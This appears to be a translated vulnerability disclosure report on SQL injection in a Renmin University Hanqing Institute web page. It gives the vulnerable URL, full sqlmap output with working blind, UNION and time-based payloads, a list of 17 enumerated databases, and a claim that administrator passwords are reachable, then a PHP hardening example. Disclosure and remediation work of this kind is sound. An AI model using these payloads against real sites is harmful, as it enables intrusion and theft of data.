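2015-09-22: Details reported to the vendor; awaiting vendor response
2015-09-27: Vendor confirmed; details disclosed to the vendor only
2015-10-07: Details disclosed to core white hats and experts in the relevant field
2015-10-17: Details disclosed to regular white hats
2015-10-27: Details disclosed to trainee white hats
2015-11-11: Details disclosed to the public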
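The Hanqing Advanced Institute of Economics and Finance at Renmin University of China (hereafter "the Hanqing Institute") is a new, internationally oriented school established at Renmin University of China with funds donated by the entrepreneur Zhao Hanqing. It was formally inaugurated in March 2007, with Professor Ji Baocheng, former president of Renmin University of China, and Professor Stiglitz, winner of the Nobel Prize in Economics, as honorary deans. Professor Liang Jing serves as executive dean and is in charge of its work. The institute also set up an academic committee headed by Professor Huang Da, former president of Renmin University of China; Professor Gregory Chow (Zou Zhizhuang) of Princeton University; Professor Wu Xiaoling, deputy director of the Financial and Economic Affairs Committee of the National People's Congress; Professor Xiong Wei of Princeton University; and Professor Hong Han of Stanford University.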
Administrator passwords for multiple sites can be obtained.
Injection point: http://www.hanqing.ruc.edu.cn/artice_list.php?class=gjjl&iClassID=34
[00:20:23] [INFO] testing connection to the target url
[00:20:24] [INFO] heuristics detected web page charset 'ISO-8859-2'
[00:20:24] [INFO] testing if the url is stable, wait a few seconds
[00:20:26] [INFO] url is stable
[00:20:26] [INFO] testing if GET parameter 'class' is dynamic
[00:20:27] [INFO] confirming that GET parameter 'class' is dynamic
[00:20:28] [INFO] GET parameter 'class' is dynamic
[00:20:29] [WARNING] reflective value(s) found and filtering out
[00:20:29] [WARNING] heuristic test shows that GET parameter 'class' might not be injectable
[00:20:29] [INFO] testing for SQL injection on GET parameter 'class'
[00:20:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:20:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:20:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:20:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[00:21:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[00:21:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:21:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[00:21:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:21:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:21:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:21:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[00:21:51] [INFO] testing 'Oracle AND time-based blind'
[00:22:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:23:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:23:13] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using the --dbms option
[00:24:31] [WARNING] GET parameter 'class' is not injectable
[00:24:31] [INFO] testing if GET parameter 'iClassID' is dynamic
[00:24:32] [INFO] confirming that GET parameter 'iClassID' is dynamic
[00:24:33] [INFO] GET parameter 'iClassID' is dynamic
[00:24:34] [WARNING] heuristic test shows that GET parameter 'iClassID' might not be injectable
[00:24:34] [INFO] testing for SQL injection on GET parameter 'iClassID'
[00:24:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:24:38] [INFO] GET parameter 'iClassID' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[00:24:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[00:24:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:24:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[00:24:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[00:24:41] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:24:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[00:24:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:24:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:25:44] [INFO] GET parameter 'iClassID' is 'MySQL > 5.0.11 AND time-based blind' injectable
[00:25:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:25:44] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[00:25:46] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:25:52] [INFO] target url appears to have 38 columns in query
[00:26:29] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[00:26:29] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. --flush-session --technique=BEUS) or try to lower the value of option '--time-sec' (e.g. --time-sec=2)
[00:27:12] [INFO] GET parameter 'iClassID' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'iClassID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 233 HTTP(s) requests:
---
Place: GET
Parameter: iClassID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: class=gjjl&iClassID=34 AND 7256=7256

    Type: UNION query
    Title: MySQL UNION query (NULL) - 38 columns
    Payload: class=gjjl&iClassID=34 LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a6672613a,0x446f6d597153646b6a53,0x3a6973743a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: class=gjjl&iClassID=34 AND SLEEP(5)
---
[00:46:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL 5.0.11
[00:46:17] [INFO] fetching database names
available databases [17]:
[*] demo_hanqing
[*] demo_hq2014
[*] demo_hq2015
[*] demo_hq_bak
[*] demo_hqen
[*] demo_psycamp2014
[*] demo_psyweb
[*] hanqing_research
[*] hanqing_sign
[*] huazi
[*] hxzcw
[*] information_schema
[*] lieren
[*] mysql
[*] ocity
[*] performance_schema
[*] weixin_yingtao
Strict filtering
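What strict filtering means for a numeric parameter such as iClassID, shown as an added example that is not part of the original report or the site's code: the value is validated as an integer and bound as a typed parameter instead of being concatenated into the query. The `article` table, its columns and the function names are hypothetical, and an in-memory SQLite database accessed through PDO stands in for the MySQL back end.

```php
<?php
// Added example: constructed schema and data; table and column names are hypothetical.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE article (id INTEGER PRIMARY KEY, class_id INTEGER, title TEXT)');
$pdo->exec("INSERT INTO article (class_id, title) VALUES (34, 'Exchange programme'), (35, 'Other')");

// Vulnerable pattern: the raw GET value becomes part of the SQL text, so
// "34 AND 7256=7256" is parsed as a condition rather than treated as a value.
function listArticlesVulnerable(PDO $pdo, $iClassID) {
    return $pdo->query("SELECT id, title FROM article WHERE class_id = $iClassID")
               ->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: accept only a positive integer, then bind it as a typed parameter.
function listArticlesHardened(PDO $pdo, $iClassID) {
    $id = filter_var($iClassID, FILTER_VALIDATE_INT,
                     array('options' => array('min_range' => 1)));
    if ($id === false) {
        return null; // caller answers HTTP 400; nothing reaches the database
    }
    $stmt = $pdo->prepare('SELECT id, title FROM article WHERE class_id = :cid');
    $stmt->bindValue(':cid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The concatenated query accepts the boolean payload as SQL and still returns rows.
printf("vulnerable  %-38s %d row(s)\n", '34 AND 7256=7256',
       count(listArticlesVulnerable($pdo, '34 AND 7256=7256')));

// One legitimate value plus the three payload shapes from the sqlmap output above.
$inputs = array(
    '34',
    '34 AND 7256=7256',
    '34 AND SLEEP(5)',
    '34 LIMIT 1,1 UNION ALL SELECT NULL#',
);
foreach ($inputs as $in) {
    $rows = listArticlesHardened($pdo, $in);
    printf("hardened    %-38s %s\n", $in,
           $rows === null ? 'rejected' : count($rows) . ' row(s)');
}
```

The database list in the sqlmap output shows that a single injectable page could enumerate 17 schemas; giving each site its own database account with access to only its own schema limits what one such flaw exposes.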
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-09-27 12:02
Notify the relevant personnel to handle this as soon as possible
None yet